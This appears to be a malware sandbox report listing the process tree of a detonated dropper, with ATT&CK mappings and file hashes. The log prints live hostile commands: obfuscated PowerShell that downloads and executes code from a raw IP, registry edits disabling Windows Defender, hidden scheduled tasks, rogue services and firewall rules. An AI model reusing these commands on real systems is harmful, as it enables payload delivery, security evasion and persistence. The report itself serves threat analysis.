C:\Users\Admin\Documents\qwLZbRWI5olGVoLz1AeO9sBt.exe
"C:\Users\Admin\Documents\qwLZbRWI5olGVoLz1AeO9sBt.exe"
3⤵
PID:6944

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:2652

C:\Users\Admin\Documents\8tlxMPYDw6gtZ278TNDrgSFv.exe
"C:\Users\Admin\Documents\8tlxMPYDw6gtZ278TNDrgSFv.exe"
3⤵
PID:6936

C:\Users\Admin\Documents\hvjoV9uoVBrkQ52viZaB6CDF.exe
"C:\Users\Admin\Documents\hvjoV9uoVBrkQ52viZaB6CDF.exe"
3⤵
PID:6928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 484
4⤵
- Program crash
PID:5416

C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe
"C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"
3⤵
PID:6908

C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe
"C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"
4⤵
PID:7668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 564
5⤵
- Program crash
PID:3580

C:\Users\Admin\Documents\eCZwUXcf2v4T9aCxpNBSxNEf.exe
"C:\Users\Admin\Documents\eCZwUXcf2v4T9aCxpNBSxNEf.exe"
3⤵
PID:6900

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4784

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:4164

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 492
4⤵
- Program crash
PID:3896

C:\Users\Admin\AppData\Local\Temp\Litever01.exe
"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4312

C:\Users\Admin\AppData\Local\Temp\Complete.exe
"C:\Users\Admin\AppData\Local\Temp\Complete.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1440

C:\Users\Admin\Documents\Zh8HfuR0H99IFab95QhRkd_A.exe
"C:\Users\Admin\Documents\Zh8HfuR0H99IFab95QhRkd_A.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 468
4⤵
- Program crash
PID:5748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 512
4⤵
- Program crash
PID:2500

C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe
"C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"
3⤵
- Executes dropped EXE
PID:944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe" -Force
4⤵
PID:4012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force
4⤵
PID:6288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe" -Force
4⤵
PID:6436

C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe
"C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"
4⤵
PID:6716

C:\Users\Admin\Documents\7E4KGS5KRYdTYM9UbhbVCkXW.exe
"C:\Users\Admin\Documents\7E4KGS5KRYdTYM9UbhbVCkXW.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 1008
4⤵
- Program crash
PID:6332

C:\Users\Admin\Documents\zsfCb6oFQmmDs_S2Bbddwzsl.exe
"C:\Users\Admin\Documents\zsfCb6oFQmmDs_S2Bbddwzsl.exe"
3⤵
PID:1920

C:\Users\Admin\AppData\Local\Temp\1624857a-7bc6-4f8c-9976-de4f7227adf1.exe
"C:\Users\Admin\AppData\Local\Temp\1624857a-7bc6-4f8c-9976-de4f7227adf1.exe"
4⤵
PID:5532

C:\Users\Admin\Documents\WRV_nd3147gQ3tPAc_hVHB_8.exe
"C:\Users\Admin\Documents\WRV_nd3147gQ3tPAc_hVHB_8.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4596

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:6524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 608
4⤵
- Program crash
PID:2696

C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe
"C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im _7j7HuriYtP_9nQOmZOUnbSw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:8144

C:\Windows\SysWOW64\taskkill.exe
taskkill /im _7j7HuriYtP_9nQOmZOUnbSw.exe /f
5⤵
- Kills process with taskkill
PID:7628

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:1172

C:\Users\Admin\Documents\YStoivV3td8fghxqUu2SgpQ_.exe
"C:\Users\Admin\Documents\YStoivV3td8fghxqUu2SgpQ_.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5168

C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe
"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\snwpteqq\
4⤵
PID:6984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fskgslo.exe" C:\Windows\SysWOW64\snwpteqq\
4⤵
PID:4636

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\fskgslo.exe /d\"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:5904

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description snwpteqq "wifi internet conection"
4⤵
PID:7132

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start snwpteqq
4⤵
PID:4788

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:7424

C:\Users\Admin\kxplxqt.exe
"C:\Users\Admin\kxplxqt.exe" /d"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe"
4⤵
PID:8184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vntucuvk.exe" C:\Windows\SysWOW64\snwpteqq\
5⤵
PID:4044

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\vntucuvk.exe /d\"C:\Users\Admin\kxplxqt.exe\""
5⤵
PID:1636

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start snwpteqq
5⤵
PID:2424

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:5864

C:\Users\Admin\Documents\bL85TOQU5EEEmVqgNQhYQtof.exe
"C:\Users\Admin\Documents\bL85TOQU5EEEmVqgNQhYQtof.exe"
3⤵
- Executes dropped EXE
PID:5596

C:\Users\Admin\Documents\UasdIN9S3pk1MBF6e1GkKLMu.exe
"C:\Users\Admin\Documents\UasdIN9S3pk1MBF6e1GkKLMu.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5588

C:\Users\Admin\AppData\Local\Temp\7zSF5D7.tmp\Install.exe
.\Install.exe
4⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\7zS1DB2.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6208

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:5928

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:6412

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:7400

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:7820

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:3880

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:5084

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:4536

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "grsZRWkjR" /SC once /ST 00:34:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:6760

C:\Users\Admin\Documents\cE8kh8YndrJJjfgDiRSXHBuB.exe
"C:\Users\Admin\Documents\cE8kh8YndrJJjfgDiRSXHBuB.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 624
4⤵
- Program crash
PID:3880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 644
4⤵
- Program crash
PID:6496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 652
4⤵
- Program crash
PID:7432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 592
4⤵
- Program crash
PID:2552

C:\Users\Admin\Documents\_XfxA3EI0PT3ie5OHUHFQLMm.exe
"C:\Users\Admin\Documents\_XfxA3EI0PT3ie5OHUHFQLMm.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:7684

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:4708

C:\Users\Admin\Documents\UkPQqosaxZEWN_UuknyJ6RgF.exe
"C:\Users\Admin\Documents\UkPQqosaxZEWN_UuknyJ6RgF.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5320

C:\Users\Admin\Documents\LPej8ron26c7SWsJgrCsKxFE.exe
"C:\Users\Admin\Documents\LPej8ron26c7SWsJgrCsKxFE.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 460
4⤵
- Program crash
PID:6008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 468
4⤵
- Program crash
PID:5952

C:\Users\Admin\Documents\8RKZYsnKNWccv71JTmpromDN.exe
"C:\Users\Admin\Documents\8RKZYsnKNWccv71JTmpromDN.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5284

C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe
"C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 2060
5⤵
- Program crash
PID:1712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:6048

C:\Users\Admin\Documents\g5B8YLScVV_0zfy7P6hxlaVs.exe
"C:\Users\Admin\Documents\g5B8YLScVV_0zfy7P6hxlaVs.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5208

C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe
"C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe"
3⤵
- Executes dropped EXE
PID:5152

C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe
"C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5144

C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe
"C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"
4⤵
PID:5072

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1840

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Loads dropped DLL
PID:3324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 608
2⤵
- Program crash
PID:3644

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:3092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3324 -ip 3324
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2008 -ip 2008
1⤵
PID:3964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4764 -ip 4764
1⤵
PID:5296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5304 -ip 5304
1⤵
PID:5792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:5888

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:5748

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
3⤵
- Enumerates processes with tasklist
PID:7044

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
3⤵
PID:8032

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
3⤵
PID:4756

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
3⤵
- Enumerates processes with tasklist
PID:7040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5284 -ip 5284
1⤵
PID:5852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 460
1⤵
- Program crash
PID:5936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5344 -ip 5344
1⤵
PID:5248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4764 -ip 4764
1⤵
PID:6032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5304 -ip 5304
1⤵
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5284 -ip 5284
1⤵
PID:5148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2008 -ip 2008
1⤵
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 4596
1⤵
PID:6568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5072 -ip 5072
1⤵
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5344 -ip 5344
1⤵
PID:6724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6928 -ip 6928
1⤵
PID:6568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4500 -ip 4500
1⤵
PID:2336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6556 -ip 6556
1⤵
PID:6032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5320 -ip 5320
1⤵
PID:7220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4500 -ip 4500
1⤵
PID:7432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5320 -ip 5320
1⤵
PID:7528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6780 -ip 6780
1⤵
PID:7936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5344 -ip 5344
1⤵
PID:7964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 464
1⤵
- Program crash
PID:7360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6556 -ip 6556
1⤵
PID:7328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5448 -ip 5448
1⤵
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6928 -ip 6928
1⤵
PID:6476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7668 -ip 7668
1⤵
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6944 -ip 6944
1⤵
PID:6184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 6780 -ip 6780
1⤵
PID:7572

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 5312 -ip 5312
1⤵
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6780 -ip 6780
1⤵
PID:2552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6592 -ip 6592
1⤵
PID:6476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6780 -ip 6780
1⤵
PID:8000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2824 -ip 2824
1⤵
PID:7724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 6140 -ip 6140
1⤵
PID:7924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5344 -ip 5344
1⤵
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8184 -ip 8184
1⤵
PID:5972

C:\Windows\SysWOW64\snwpteqq\vntucuvk.exe
C:\Windows\SysWOW64\snwpteqq\vntucuvk.exe /d"C:\Users\Admin\kxplxqt.exe"
1⤵
PID:4880

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6780 -ip 6780
1⤵
PID:6740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4880 -ip 4880
1⤵
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5388 -ip 5388
1⤵
PID:7424

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
d76cb0dcfe4e83ca0480818fa1a2ac61

SHA1
bfe449f0ca852d4827911b08281c8bc643b9d204

SHA256
13deaa0dd2ec7dfe8a62953a43e327c07c2f1f4fad04da083cd772a1b7fbac0d

SHA512
c57a9f62e2c79675d9cf1a7e5fda0f4bcf40a8d2d29d186ca830b2ac616420a4361eeb57ab882e6878eb56faae4062bd4f02fb2ab081480a19b92ebd1a774abe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
